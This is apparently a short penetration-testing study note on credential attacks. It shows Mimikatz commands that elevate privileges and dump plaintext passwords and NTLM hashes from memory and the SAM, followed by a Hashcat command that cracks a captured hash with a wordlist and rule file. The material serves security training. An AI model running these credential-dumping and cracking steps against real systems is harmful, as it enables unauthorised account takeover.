# Crack NTLM Hashes

## Dumping NTLM hashes with Mimikatz

Using the sekurlsa module, we can attempt to extract plaintext passwords and password hashes from all available sources using:

```
sekurlsa::logonpasswords
```

We can also extract all NTLM hashes from the SAM using:

```
lsadump::sam
```

For this command, we must first enter:

```
token::elevate
```

to elevate to SYSTEM privileges. We also need the SeDebugPrivilege access right enabled, which can be accomplished using:

```
privilege::debug
```

## Cracking with Hashcat

Once we have the NTLM hash for a user, we can retrieve the correct hash mode from Hashcat's help output:

```bash
kali@kali:~/passwordattacks$ hashcat --help | grep -i "ntlm"

   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocol
   5600 | NetNTLMv2                                           | Network Protocol
  27100 | NetNTLMv2 (NT)                                      | Network Protocol
   1000 | NTLM
```

We now have everything needed to start cracking the hash. The next step is to choose a wordlist and a rule file. For example, we will use the rockyou.txt wordlist with the best64.rule rule file, which contains 64 effective rules.

{% code overflow="wrap" %}

```bash
kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
```

{% endcode %}
